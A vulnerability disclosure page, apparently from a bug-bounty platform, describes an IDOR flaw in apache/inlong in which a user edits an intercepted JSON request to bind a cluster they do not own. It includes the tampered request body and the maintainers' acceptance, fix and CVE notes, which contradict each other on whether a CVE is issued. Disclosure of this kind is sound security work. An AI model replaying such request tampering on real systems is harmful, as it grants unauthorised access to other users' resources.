IDOR make users can bind any cluster in apache/inlong

Valid

Reported on

Apr 17th 2023

Proof of Concept

1 admin create cluster1, cluster2, clusterTag1 and clusterTag2

2 admin add user1 as owner of cluster1,clusterTag1

3 user1 bind clusterTag1 to cluster1

4 user1 use burpsuite hiajck the request

5 the request content can be

{"clusterTag":"biaoqia4","bindClusters":[1]}

6 change the request content:

{"clusterTag":"biaoqia4","bindClusters":[1,2]}

  2 is the id of cluster2. user1 is not the owner of cluster2.

7 result:

{"success":true,"errMsg":null,"data":true}

Impact

attack can bind any cluster, even the he is not the owner of the cluster.

We are processing your report and will contact the apache/inlong team within 24 hours. a month ago
lujiefsi modified the report
a month ago
lujiefsi modified the report
a month ago
We have contacted a member of the apache/inlong team and are waiting to hear back a month ago
ASF
a month ago

Maintainer

The team accepts this report as a security vulnerability, and is planning to issue a CVE for it. There is a tentative fix at https://github.com/apache/inlong/pull/7949 , if you have a chance we would much appreciate your review. We'd appreciate it if you'd keep this issue private until we have released a version with the fix and disclosed the CVE

ASF Security Team validated this vulnerability 3 days ago

This issue was disclosed as CVE-2023-31454: https://www.cve.org/CVERecord?id=CVE-2023-31454

lujiefsi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ASF Security Team marked this as fixed in 1.7.0 with commit 216b9b 3 days ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
ASF Security Team published this vulnerability 3 days ago
to join this conversation